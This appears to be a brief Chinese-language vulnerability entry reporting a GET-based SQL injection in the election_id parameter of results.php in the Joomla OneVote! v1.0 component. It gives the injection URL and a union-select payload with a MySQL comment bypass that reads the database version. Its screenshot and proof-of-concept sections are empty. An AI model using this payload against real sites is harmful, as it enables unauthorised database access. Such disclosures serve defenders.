Joomla! Component OneVote! v1.0 - SQL Injection
results.php中的election_id参数带入SQL语句存在GET类型注入
注入点:
http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
union注入 payload:
+/*!50000union*/+select+@@version-- -
测试截图:

其他类型的注入:

PoC验证:

暂无评论